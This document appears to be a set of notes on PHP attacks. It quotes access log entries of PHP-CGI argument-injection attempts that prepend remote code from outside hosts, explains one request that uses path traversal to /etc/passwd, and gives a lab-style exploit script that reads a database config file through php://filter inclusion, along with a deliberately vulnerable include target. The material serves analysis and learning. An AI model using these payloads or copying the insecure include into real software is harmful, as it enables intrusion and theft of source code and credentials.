"POST /ascriptname.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 82 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.04 Chromium/15.0.871.0 Chrome/15.0.871.0 Safari/535.2"
"POST /downloads/rytwi.php HTTP/1.1" 200 13 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
======================================================================
“POST /index.php/topic/comments/have-you-ever/?-d+allow_url_include=1+-d+auto_prepend_file=php://input HTTP/1.1” 200 115 http://www.domain.com “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7)” “-”
“POST /error/lmqtrfy.php HTTP/1.1” 200 25 http://www.domain.com “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1” “-”
======================================================================
/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://chetlemon.com/upload.txt
======================================================================
http://naughtymanila.com/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://blackhole.hostenko.com/1.txt+-n
======================================================================
The above URL is decoded as:
http://my_ip/?-d allow_url_include=On+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n/?-d allow_url_include=On+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n
?-d allow_url_include=On: he is trying to add an extra parameter in the php-cgi call:
$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f
php
-d foo[=bar] Define INI entry foo with value 'bar'
+-d auto_prepend_file=../../../../../../../../../../../../etc/passwd� -n: then prepend his file as code to execute. Don't know why he uses Path Traversal attack here instead of using his code or php://input.
-n at the end to negate the php.ini:
$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f
php
-n No php.ini file will be used
PS: No need to worry if you aren't running PHP as a CGI script.
========================================================================
hackconndb.php
<?PHP
$url = "http://127.0.0.1:82/4_hackconndb.php?urlConfig=php://filter/convert.base64-encode/resource=conndb.php";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);
$contents = curl_exec($ch);
if (curl_errno($ch)) {
echo curl_error($ch);
echo "\n
";
$contents = '';
} else {
curl_close($ch);
}
if (!is_string($contents) || !strlen($contents)) {
echo "Failed to get contents.";
$contents = '';
}
echo "<textarea name='source' rows='25' cols='120'>" . base64_decode($contents) . "</textarea>";
?>
------------------------------------------------------------------------------------------------------------
4_hackconndb.php
<?PHP
include($_REQUEST["urlConfig"]);
?>
========================================================================
